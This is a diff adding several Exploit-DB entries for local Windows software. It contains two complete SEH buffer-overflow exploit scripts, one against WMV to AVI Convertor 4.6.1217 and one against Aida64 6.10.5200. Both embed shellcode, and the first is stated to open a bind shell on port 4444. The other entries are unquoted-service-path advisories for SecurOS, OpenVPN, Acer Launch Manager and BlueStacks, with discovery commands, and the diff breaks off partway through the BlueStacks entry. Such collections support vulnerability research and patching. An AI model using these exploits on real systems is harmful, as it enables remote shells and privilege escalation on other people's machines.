+# of the application.
+
+# Step to discover the unquoted Service:
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+SecurOS Control Service		SecurosCtrlService	C:\Program Files (x86)\ISS\SecurOS\securos_svc.exe	Auto
+
+# Service info:
+
+C:\Users\user>sc qc SecurosCtrlService
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: SecurosCtrlService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ISS\SecurOS\securos_svc.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : SecurOS Control Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47568.py b/exploits/windows/local/47568.py
new file mode 100755
index 000000000..fc5eff7a4
--- /dev/null
+++ b/exploits/windows/local/47568.py
@@ -0,0 +1,59 @@
+# Exploit Title: WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)
+# Google Dork: N/A
+# Date: 2019-10-30
+# Exploit Author: Doan Nguyen (4ll4u)
+# Vendor Homepage:https://www.alloksoft.com/
+# Software Link:  https://www.alloksoft.com/wmv.htm
+# Version: v4.6.1217
+# Tested on: Windows XP SP3
+# CVE : N/A
+# Reference from : [1] https://www.exploit-db.com/exploits/47563        
+
+# 1.- Run python code :poc.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open  WMV to AVI MPEG DVD WMV Convertor and Click 'EnterKey'
+# 4.- Paste the content of EVIL.txt into the Field: 'License Name and License Code'
+# 5.- Click 'OK' and you will get a bind shell on port 4444
+
+#msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -b '\x00' -f hex
+#We need to create meaningful characters when pasting into the password on the application (allow characters include:\x21->\x7E in ASCII TABLE)
+shellcode = (
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x53\x2A\x52\x25\x2D\x53\x2A\x52\x25\x2D\x55\x2A\x52\x25\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x23\x34\x4D\x68\x2D\x23\x34\x4D\x68\x2D\x24\x36\x4D\x69\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x5C\x30\x75\x2D\x62\x5C\x30\x75\x2D\x62\x5E\x31\x75\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x60\x73\x71\x3B\x2D\x60\x73\x71\x3B\x2D\x61\x75\x73\x3D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4B\x39\x6F\x40\x2D\x4B\x39\x6F\x40\x2D\x4C\x39\x70\x40\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x47\x44\x27\x2D\x62\x47\x44\x27\x2D\x63\x47\x45\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x38\x49\x2A\x35\x2D\x38\x49\x2A\x35\x2D\x38\x49\x2A\x36\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5D\x71\x68\x26\x2D\x5D\x71\x68\x26\x2D\x5D\x71\x6A\x28\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x47\x21\x25\x28\x2D\x47\x21\x25\x28\x2D\x49\x22\x27\x29\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x44\x56\x34\x3C\x2D\x44\x56\x34\x3C\x2D\x45\x58\x35\x3C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x57\x31\x33\x44\x2D\x57\x31\x33\x44\x2D\x58\x32\x34\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3C\x6E\x4F\x50\x2D\x3C\x6E\x4F\x50\x2D\x3E\x70\x50\x52\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3F\x38\x33\x5F\x2D\x3F\x38\x33\x5F\x2D\x40\x39\x33\x60\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6F\x4D\x38\x22\x2D\x6F\x4D\x38\x22\x2D\x6F\x4F\x3A\x24\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x72\x56\x55\x2D\x62\x72\x56\x55\x2D\x63\x74\x58\x55\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4B\x66\x52\x53\x2D\x4B\x66\x52\x53\x2D\x4C\x67\x52\x54\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3B\x22\x35\x71\x2D\x3B\x22\x35\x71\x2D\x3C\x22\x37\x72\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2E\x4F\x64\x55\x2D\x2E\x4F\x64\x55\x2D\x2E\x51\x65\x55\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x59\x48\x59\x5A\x2D\x59\x48\x59\x5A\x2D\x5B\x4A\x59\x5B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x62\x5C\x5A\x2D\x49\x62\x5C\x5A\x2D\x4A\x64\x5C\x5C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x63\x54\x2A\x47\x2D\x63\x54\x2A\x47\x2D\x65\x55\x2A\x47\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x48\x4D\x4D\x43\x2D\x48\x4D\x4D\x43\x2D\x49\x4F\x4E\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x30\x75\x60\x3A\x2D\x30\x75\x60\x3A\x2D\x32\x75\x60\x3A\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x60\x6B\x3F\x52\x2D\x60\x6B\x3F\x52\x2D\x60\x6D\x40\x54\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3F\x47\x21\x58\x2D\x3F\x47\x21\x58\x2D\x3F\x49\x22\x58\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x65\x4E\x25\x4A\x2D\x65\x4E\x25\x4A\x2D\x65\x4E\x27\x4C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3E\x35\x60\x46\x2D\x3E\x35\x60\x46\x2D\x3E\x37\x60\x46\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x45\x2E\x2D\x41\x2D\x45\x2E\x2D\x41\x2D\x45\x30\x2E\x42\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6C\x4B\x74\x4C\x2D\x6C\x4B\x74\x4C\x2D\x6E\x4C\x74\x4C\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x42\x43\x29\x26\x2D\x42\x43\x29\x26\x2D\x43\x43\x2A\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2F\x61\x43\x34\x2D\x2F\x61\x43\x34\x2D\x31\x61\x45\x34\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x50\x58\x4B\x69\x2D\x50\x58\x4B\x69\x2D\x52\x59\x4D\x6A\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x71\x29\x29\x39\x2D\x71\x29\x29\x39\x2D\x73\x2B\x2A\x39\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x54\x68\x52\x6D\x2D\x54\x68\x52\x6D\x2D\x55\x68\x52\x6D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x20\x3C\x5B\x64\x2D\x20\x3C\x5B\x64\x2D\x21\x3E\x5B\x66\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x58\x6E\x65\x6B\x2D\x58\x6E\x65\x6B\x2D\x5A\x6F\x67\x6B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x69\x26\x52\x23\x2D\x69\x26\x52\x23\x2D\x69\x27\x54\x25\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x46\x3F\x27\x71\x2D\x46\x3F\x27\x71\x2D\x48\x40\x29\x72\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3C\x24\x52\x54\x2D\x3C\x24\x52\x54\x2D\x3E\x26\x54\x54\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5C\x40\x4F\x55\x2D\x5C\x40\x4F\x55\x2D\x5D\x40\x51\x57\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6A\x5C\x33\x58\x2D\x6A\x5C\x33\x58\x2D\x6A\x5C\x34\x59\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5F\x3E\x5A\x5D\x2D\x5F\x3E\x5A\x5D\x2D\x5F\x40\x5C\x5E\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x4D\x6A\x3B\x2D\x49\x4D\x6A\x3B\x2D\x4A\x4F\x6C\x3C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x23\x6B\x3D\x2D\x62\x23\x6B\x3D\x2D\x63\x23\x6B\x3F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x23\x6A\x57\x67\x2D\x23\x6A\x57\x67\x2D\x24\x6C\x57\x67\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x23\x43\x60\x50\x2D\x23\x43\x60\x50\x2D\x25\x43\x60\x50\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x73\x31\x34\x2A\x2D\x73\x31\x34\x2A\x2D\x73\x33\x34\x2B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x38\x56\x63\x59\x2D\x38\x56\x63\x59\x2D\x39\x56\x65\x59\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x40\x52\x60\x66\x2D\x40\x52\x60\x66\x2D\x41\x53\x61\x67\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x24\x61\x73\x2A\x2D\x24\x61\x73\x2A\x2D\x26\x61\x75\x2A\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x48\x34\x53\x66\x2D\x48\x34\x53\x66\x2D\x48\x34\x54\x68\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3C\x26\x57\x26\x2D\x3C\x26\x57\x26\x2D\x3C\x27\x58\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x54\x63\x3A\x27\x2D\x54\x63\x3A\x27\x2D\x54\x63\x3A\x27\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x26\x26\x2F\x50\x2D\x26\x26\x2F\x50\x2D\x27\x27\x2F\x51\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x30\x52\x2E\x62\x2D\x30\x52\x2E\x62\x2D\x30\x54\x30\x63\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x31\x5A\x75\x73\x2D\x31\x5A\x75\x73\x2D\x32\x5B\x75\x75\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x36\x41\x66\x56\x2D\x36\x41\x66\x56\x2D\x36\x42\x68\x57\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x36\x63\x50\x32\x2D\x36\x63\x50\x32\x2D\x36\x63\x51\x33\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x59\x4B\x23\x26\x2D\x59\x4B\x23\x26\x2D\x5A\x4C\x24\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x28\x68\x4A\x4D\x2D\x28\x68\x4A\x4D\x2D\x2A\x69\x4B\x4F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2E\x41\x53\x6A\x2D\x2E\x41\x53\x6A\x2D\x30\x42\x55\x6A\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6F\x6A\x2F\x6D\x2D\x6F\x6A\x2F\x6D\x2D\x6F\x6A\x2F\x6E\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2C\x44\x30\x30\x2D\x2C\x44\x30\x30\x2D\x2D\x46\x30\x31\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4A\x67\x69\x4F\x2D\x4A\x67\x69\x4F\x2D\x4A\x69\x69\x51\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x65\x44\x45\x68\x2D\x65\x44\x45\x68\x2D\x66\x44\x45\x6A\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6F\x57\x32\x45\x2D\x6F\x57\x32\x45\x2D\x6F\x59\x34\x47\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x35\x2C\x45\x43\x2D\x35\x2C\x45\x43\x2D\x37\x2C\x46\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x69\x4A\x5A\x6D\x2D\x69\x4A\x5A\x6D\x2D\x6A\x4A\x5C\x6F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2F\x54\x6B\x5E\x2D\x2F\x54\x6B\x5E\x2D\x2F\x56\x6B\x60\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x40\x25\x6E\x55\x2D\x40\x25\x6E\x55\x2D\x41\x26\x6E\x57\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x52\x6F\x33\x2D\x2D\x52\x6F\x33\x2D\x2D\x52\x70\x33\x2F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3A\x6E\x6D\x3D\x2D\x3A\x6E\x6D\x3D\x2D\x3B\x6E\x6E\x3E\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4E\x3D\x41\x4F\x2D\x4E\x3D\x41\x4F\x2D\x4F\x3D\x42\x4F\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x28\x48\x64\x2D\x49\x28\x48\x64\x2D\x4A\x28\x49\x64\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x73\x2E\x5A\x59\x2D\x73\x2E\x5A\x59\x2D\x74\x2E\x5A\x59\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4E\x68\x29\x3A\x2D\x4E\x68\x29\x3A\x2D\x4F\x68\x2B\x3B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x21\x32\x38\x36\x2D\x21\x32\x38\x36\x2D\x22\x32\x38\x36\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x53\x4C\x2B\x47\x2D\x53\x4C\x2B\x47\x2D\x54\x4C\x2B\x47\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5C\x2F\x47\x6B\x2D\x5C\x2F\x47\x6B\x2D\x5E\x31\x47\x6B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6D\x35\x37\x5C\x2D\x6D\x35\x37\x5C\x2D\x6D\x35\x39\x5D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x28\x35\x41\x22\x2D\x28\x35\x41\x22\x2D\x28\x36\x43\x22\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2D\x40\x6F\x2B\x2D\x2D\x40\x6F\x2B\x2D\x2F\x41\x6F\x2C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x20\x42\x3C\x2B\x2D\x20\x42\x3C\x2B\x2D\x21\x43\x3E\x2D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3F\x4E\x54\x2B\x2D\x3F\x4E\x54\x2B\x2D\x3F\x50\x54\x2B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x29\x69\x53\x44\x2D\x29\x69\x53\x44\x2D\x2B\x6A\x54\x46\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x6B\x6F\x39\x2D\x62\x6B\x6F\x39\x2D\x62\x6C\x6F\x39\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x67\x6C\x40\x26\x2D\x67\x6C\x40\x26\x2D\x69\x6E\x41\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x59\x36\x44\x2D\x49\x59\x36\x44\x2D\x4A\x59\x37\x46\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x61\x68\x61\x2E\x2D\x61\x68\x61\x2E\x2D\x61\x68\x63\x2E\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x70\x6f\x6f\x6f\x50\x50\x50" # push 12 NOP 
+)
+
+alignment = "\x54\x58\x2d\x54\x54\x54\x54\x2d\x37\x63\x54\x54\x2d\x25\x31\x57\x57\x50\x5C" # stack alignment 001292C0 - 0012AA10
+jump_short = "\x90\x90\xEB\x08"  # jump to 00129A44
+pop_pop_ret ="\x09\x9a\x01\x10" # pop pop ret in SkinMagic.dll
+buffer = "\x41" * 780 + jump_short + pop_pop_ret + "\x41\x41\x41\x41" + alignment + shellcode + (6000 - 780 - 4 - 4 - len(shellcode) - len(alignment)) * "\x45"
+
+try:
+    f=open("shell.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(buffer)
+    f.write(buffer)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/47570.txt b/exploits/windows/local/47570.txt
new file mode 100644
index 000000000..5f0a4b1ba
--- /dev/null
+++ b/exploits/windows/local/47570.txt
@@ -0,0 +1,39 @@
+# Title: OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path
+# Author: Sainadh Jamalpur
+# Date: 2019-10-31
+# Vendor Homepage: https://openvpn.net/
+# Software Link: https://swupdate.openvpn.org/privatetunnel/client/privatetunnel-win-2.8.exe
+# Version : PrivateTunnel v2.8.4
+# Tested on: Windows 10 64bit(EN)
+# CVE : N/A
+
+# =====================================================
+# 1. Description:
+# Unquoted service paths in OpenVPN Private Tunnel v2.8.4 have an unquoted service path.
+
+#PoC
+===========
+C:\>sc qc ovpnagent
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ovpnagent
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\OpenVPN
+Technologies\PrivateTunnel\ovpnagent.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : OpenVPN Agent
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\>
+
+#Exploit:
+============
+A successful attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or other
+security applications where it could potentially be executed during
+application startup or reboot. If successful, the local user's code
+would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/47574.py b/exploits/windows/local/47574.py
new file mode 100755
index 000000000..4730070eb
--- /dev/null
+++ b/exploits/windows/local/47574.py
@@ -0,0 +1,70 @@
+# Exploit Title: Aida64 6.10.5200 - Buffer Overflow (SEH)
+# Date: 2019-10-28
+# Exploit Author: 8-Team / daejinoh
+# Vendor Homepage: https://www.aida64.com
+# Software Link: https://www.aida64.com/downloads/OTAwMmVmNTE=
+# Version: AIDA64 Enginner 6.10.5200
+# Tested on: Windows 7 Home Basic SP1
+# CVE : N/A
+
+# Step
+1) File -> Preferences -> Logging -> Log sensor readings to CSV log file
+2) Paste payload from "aida64.txt" -> Apply
+3) File -> Exit
+
+# Exploit Code
+#! Python
+
+import struct
+
+# shell code
+buf =  ""
+buf += "\x89\xe2\xda\xc3\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4f\x4e\x68\x58\x49"
+buf += "\x67\x59\x34\x58\x38\x6a\x7a\x49\x4b\x78\x59\x42\x54"
+buf += "\x55\x74\x6c\x34\x66\x38\x65\x63\x6b\x79\x6c\x71\x34"
+buf += "\x71\x4f\x73\x79\x50\x66\x64\x55\x61\x30\x70\x34\x4f"
+buf += "\x54\x43\x62\x50\x78\x57\x72\x35\x42\x71\x67\x34\x34"
+buf += "\x4f\x33\x6b\x4c\x5a\x38\x35\x78\x4f\x35\x6c\x52\x32"
+buf += "\x76\x30\x49\x6e\x51\x6c\x37\x30\x56\x70\x32\x70\x70"
+buf += "\x4d\x43\x32\x62\x54\x31\x4c\x37\x56\x43\x76\x50\x6d"
+buf += "\x68\x57\x73\x7a\x50\x4f\x4f\x72\x52\x70\x59\x70\x6d"
+buf += "\x79\x4c\x6d\x75\x31\x32\x79\x6b\x39\x4e\x4c\x68\x61"
+buf += "\x39\x30\x39\x4e\x36\x6e\x48\x58\x73\x5a\x37\x63\x50"
+buf += "\x4e\x37\x6d\x6f\x66\x4b\x6e\x46\x62\x48\x76\x69\x4c"
+buf += "\x52\x6d\x38\x33\x33\x43\x6e\x48\x50\x4d\x47\x48\x6a"
+buf += "\x6f\x67\x4c\x49\x46\x39\x4d\x4e\x67\x75\x6f\x6a\x57"
+buf += "\x64\x33\x6f\x6c\x36\x79\x69\x47\x33\x42\x51\x61\x47"
+buf += "\x62\x43\x6e\x72\x4d\x6a\x36\x77\x6f\x75\x78\x45\x56"
+buf += "\x72\x4c\x48\x6b\x6e\x4b\x5a\x6e\x4d\x6d\x75\x44\x56"
+buf += "\x67\x54\x6f\x70\x72\x7a\x47\x36\x39\x34\x37\x4f\x44"
+buf += "\x62\x38\x74\x6c\x6d\x51\x48\x47\x39\x35\x54\x77\x31"
+buf += "\x46\x6f\x4a\x31\x61\x6f\x4d\x30\x4d\x47\x6c\x48\x71"
+buf += "\x42\x45\x6f\x5a\x4f\x6d\x69\x46\x4c\x30\x65\x69\x4c"
+buf += "\x51\x5a\x33\x54\x37\x71\x75\x4e\x55\x56\x42\x43\x6b"
+buf += "\x65\x4d\x6a\x61\x4e\x4f\x31\x4a\x4b\x42\x47\x30\x4a"
+buf += "\x4b\x62\x58\x49\x46\x73\x39\x4c\x6f\x39\x71\x50\x4f"
+buf += "\x4b\x47\x35\x4e\x37\x6d\x6e\x6f\x43\x68\x6b\x4e\x4f"
+buf += "\x4b\x39\x4b\x33\x44\x4a\x4b\x58\x31\x4e\x61\x32\x32"
+buf += "\x59\x7a\x77\x34\x6d\x6c\x66\x30\x5a\x4c\x33\x66\x6f"
+buf += "\x4f\x7a\x64\x6d\x55\x53\x57\x64\x74\x6c\x4b\x5a\x72"
+buf += "\x73\x47\x6d\x4f\x4b\x58\x34\x6d\x50\x32\x6e\x62\x76"
+buf += "\x38\x6f\x56\x6f\x6b\x56\x36\x6e\x39\x4e\x4b\x45\x4b"
+buf += "\x6e\x6d\x77\x6d\x78\x52\x4f\x6f\x71\x34\x49\x4d\x71"
+buf += "\x31\x6d\x6f\x30\x4c\x4a\x78\x70\x6e\x46\x67\x4d\x6c"
+buf += "\x6c\x50\x69\x6f\x49\x72\x49\x52\x53\x37\x69\x6f\x54"
+buf += "\x66\x49\x31\x4b\x76\x4d\x43\x4c\x6b\x56\x68\x42\x4d"
+buf += "\x76\x74\x33\x79\x76\x35\x41\x41"
+
+# Exploit Payload
+sehNext = struct.pack('<L',0x909010EB) # SHORT JMP
+sehHandler = struct.pack('<L',0x0120c8b6) # POP POP RET
+
+payload = 'A' * (1115 - 4)  + sehNext + sehHandler + "\x90" * 16 + buf +"B"*1000
+
+f = open("aida64.txt", "wb")
+f.write(payload)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/47575.txt b/exploits/windows/local/47575.txt
new file mode 100644
index 000000000..f7ae1b49e
--- /dev/null
+++ b/exploits/windows/local/47575.txt
@@ -0,0 +1,34 @@
+# Exploit Title: OpenVPN Connect 3.0.0.272 - 'ovpnagent' Unquoted Service Path
+# Discovery by: Luis Martinez
+# Discovery Date: 2019-11-03
+# Vendor Homepage: https://openvpn.net
+# Software Link : https://openvpn.net/downloads/openvpn-connect-v3-windows.msi
+# Tested Version: 3.0.0.(272)
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ovpnconnect" | findstr /i /v """
+
+OpenVPN Agent agent_ovpnconnect		agent_ovpnconnect	C:\Program Files\OpenVPN Connect\agent_ovpnconnect_1559309046710.exe	Auto
+
+# Service info:
+
+C:\>sc qc agent_ovpnconnect
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: agent_ovpnconnect
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\OpenVPN Connect\agent_ovpnconnect_1559309046710.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : OpenVPN Agent agent_ovpnconnect
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/47577.txt b/exploits/windows/local/47577.txt
new file mode 100644
index 000000000..251141cff
--- /dev/null
+++ b/exploits/windows/local/47577.txt
@@ -0,0 +1,38 @@
+# Title: Launch Manager 6.1.7600.16385 'DsiWMIService' Unquoted Service Path
+# Author: Gustavo Briseño
+# Date: 2019-11-03
+# Vendor Homepage: https://www.acer.com/
+# Software Link: https://global-download.acer.com/GDFiles/Application/LaunchManager/LaunchManager_Dritek_6.1.7600.16385_W7x86W7x64_A.zip?acerid=634193506101268520&Step1=NOTEBOOK&Step2=ASPIRE&Step3=ASPIRE%204333&OS=ALLLC=es&BC=ACER&SC=PA_2#_ga=2.248825730.460116227.1572829430-701800474.1572829429
+# Version : Launch Manager 6.1.7600.16385
+# Tested on: Windows 7 Home Basic 64bit
+# CVE : N/A
+
+# =====================================================
+# 1. Description:
+# Unquoted service paths in DsiWMIService have an unquoted service path.
+
+#PoC
+===========
+C:\>sc qc DsiWMIService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: DsiWMIService
+        TYPE                                : 10  WIN32_OWN_PROCESS
+        START_TYPE                   : 2   AUTO_START
+        ERROR_CONTROL         : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Launch Manager\dsiwmis.exe
+        LOAD_ORDER_GROUP :
+        TAG                                  : 0
+        DISPLAY_NAME              : Dritek WMI Service
+        DEPENDENCIES               :
+        SERVICE_START_NAME : LocalSystem
+
+C:\>
+
+#Exploit:
+============
+A successful attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or other
+security applications where it could potentially be executed during
+application startup or reboot. If successful, the local user's code
+would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/47582.txt b/exploits/windows/local/47582.txt
new file mode 100644
index 000000000..b4903f3bf
--- /dev/null
+++ b/exploits/windows/local/47582.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Blue Stacks App Player 2.4.44.62.57 - "BstHdLogRotatorSvc" Unquote Service Path
+# Date: 2019-11-09
+# Exploit Author: Diego Armando Buztamante Rico
+# Vendor Homepage: www.bluestacks.com
+# Software Link: www.bluestacks.com
+# Version: 2.4.44.62.57
+# Tested on: Windows 8.1 Pro
+# CVE: NA
+
+#Description
+#Blue Stacks is an application which allows to run mobile apps on Windows and Mac. 
+#The service BstHdLogRotatorSvc is use to allow HD displays of Blue Stacks app.
+#The service suffers from an unquoted path.
+
+#PoC using CMD
+#Command to discover the unquoted path:
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """"
+
+#As a result we have
+
